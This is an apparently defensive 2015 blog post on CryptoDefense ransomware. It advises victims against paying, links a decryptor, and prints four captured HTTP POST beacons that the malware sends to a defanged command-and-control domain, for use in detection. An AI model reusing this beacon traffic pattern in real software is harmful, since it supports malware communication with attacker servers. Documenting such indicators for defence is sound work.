CryptoDefense Ransomware PCAP Traffic Sample Malware – How to decrypt your files

By | August 23, 2015

Cryptolocker-Lock

 

 

Solution – Step 1 – Install this free trial of Kaspersky to remove the malware

 

Solution – Step 2

Don’t pay the ransom, there is a solution for CryptoDefense and CryptoLocker, this below is from bleepingcomputer.com

How to restore files encrypted by CryptoDefense using the Emsisoft Decryptor

If you were infected before April 1st, 2014 then you may have been infected with a variant that mistakenly left the private decryption key behind on the computer. To begin please download decrypt_cryptodefense.zip from the following URL and save it to your desktop.

http://tmp.emsisoft.com/fw/decrypt_cryptodefense.zip

 

Here is a sample of what the network traffic looks like, traffic sample donated by one of our subscribers:

 

 

Cryptodefense

 

POST /dhcpshm1b8he4y HTTP/1.1

Accept: */*

Content-Type: application/x-www-form-urlencoded

Connection: Close

Content-Length: 88

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.30729;  .NET CLR 3.5.30729; .NET4.0C)

Host: machetesraka[.]com

Cache-Control: no-cache

 

y=b235aj04825c514b4995676755202a2dc9ccb1dbe13d4e69035dsdg36473f9122eecdefe948c341ba718b1

 

 

POST /a9he8f4z2j332 HTTP/1.1

Accept: */*

Content-Type: application/x-www-form-urlencoded

Connection: Close

Content-Length: 88

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.30729;  .NET CLR 3.5.30729; .NET4.0C)

Host: machetesraka[.]com

Cache-Control: no-cache

 

z=a832jf842084b936eb1327f8eee774ca252373e9f93c44e7420f3909f2e569a0b772f033a904e8cc767b6c

 

POST /bwadw33tbbae2 HTTP/1.1

Accept: */*

Content-Type: application/x-www-form-urlencoded

Connection: Close

Content-Length: 88

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.30729;  .NET CLR 3.5.30729; .NET4.0C)

Host: machetesraka[.]com

Cache-Control: no-cache

w=ccc346456aef8320d4ab3c64e26b9e1576cf4289d05bbsdrr3452bbc16576045eaf5e8aa5aa5937452baj3

 

POST /3lt1ojfs8yz HTTP/1.1

Accept: */*

Content-Type: application/x-www-form-urlencoded

Connection: Close

Content-Length: 88

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.30729;  .NET CLR 3.5.30729; .NET4.0C)

Host: machetesraka[.]com

Cache-Control: no-cache

 

z=eeeesf352aa235b2b1e5cd6dbad353213699923jbaej4e7643jfjseeb6d4860f51d24daf1144ffdc98456b

 

Share Button

2 thoughts on “CryptoDefense Ransomware PCAP Traffic Sample Malware – How to decrypt your files

  1. Pingback: click here link click click this link good site here is the site http://www.clemsondeckbuilders.com/ www.clemsondeckbuilders.com/ clemsondeckbuilders.com/ http://www.clemsondeckbuilders.com/ www.clemsondeckbuilders.com/ clemsondeckbuilders.com/ http://www

  2. Pingback: Joseph de Saram#Rhodium

Leave a Reply

Your email address will not be published. Required fields are marked *